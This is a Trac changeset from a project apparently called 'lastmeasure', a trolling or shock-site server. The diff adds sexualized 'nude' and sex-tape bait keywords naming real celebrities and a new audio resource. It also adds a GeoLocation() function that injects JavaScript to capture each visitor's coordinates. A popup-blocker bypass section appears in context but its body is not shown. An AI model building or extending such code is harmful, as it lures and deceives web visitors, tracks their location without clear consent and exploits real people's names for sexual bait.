Ignore:
Timestamp:
02/03/12 17:58:40 (16 months ago)
Author:
literalka
Message:

<3 tehdely

Location:
trollforge/lastmeasure
Files:
2 added
3 edited

Legend:

Unmodified
Added
Removed
  • trollforge/lastmeasure/server/lmkeywords.h

    r678 r681  
    283283    "nokenny", "caribbean islands", "caribbean airlines", "weretiger", 
    284284    "not4chan", "no kenny", "jillian and ed till together", "wingerdinger", 
     285    "skater contre wesh belge", "entartage de fr hollande", 
    285286/* {{{ Nude Celebs */ 
    286287    "shakira nue", "rihanna nue", "vanessa demouy nue", "clara morgane nue", 
    287288    "jessica alba nue", "celine durand nue", "ashley greene sex tape", 
    288289    "coeur de pirate nue", "victoria beckham nue", "gros cul de kim kardashian", 
    289     "amy winehouse sex tape",  
     290    "amy winehouse sex tape", "melissa theuriau nue", "ludivine sagnier", 
     291    "femme a lunette nue", 
    290292/* }}} */ 
    291293/* }}} */ 
  • trollforge/lastmeasure/server/lmresource.h

    r680 r681  
    5757    "/audio/rkz.wav",      "/audio/rucas.wav", 
    5858    "/audio/sam.wav",      "/audio/trogg.wav", 
    59     "/audio/unknown.wav", 
     59    "/audio/unknown.wav",  "/audio/tehdely.wav", 
    6060 
    6161    /* <iframe> */ 
     
    483483    } 
    484484/* }}} */ 
     485/* {{{ Geolocation */ 
     486    static std::string GeoLocation() 
     487    { 
     488        std::stringstream ret(""); 
     489 
     490        ret << 
     491 
     492        "var latitude, longitude;\r\n" 
     493 
     494        "if (navigator.geolocation) {\r\n" 
     495        "    navigator.geolocation.getCurrentPosition( function (position) {\r\n" 
     496        "        latitude = (position.coords.latitude);\r\n" 
     497        "        longitude = (position.coords.longitude);\r\n" 
     498        "    });\r\n" 
     499        "}\r\n"; 
     500 
     501        return ret.str(); 
     502    } 
     503/* }}} */ 
    485504/* {{{ This chunk bypasses pop-ups */ 
    486505/* {{{ PopupBypasser() */ 
  • trollforge/lastmeasure/server/lmserver.cpp

    r673 r681  
    260260 
    261261    send(client, response.str().c_str(), response.str().length(), 0); 
    262  
     262    /* log format: host [Utils::Time()] "request resource" data.first.length() referer agent */ 
    263263    /* Send gzipped data for fun. TODO: Not very useful yet */ 
    264264    if (flags & 1) 
Note: See TracChangeset for help on using the changeset viewer.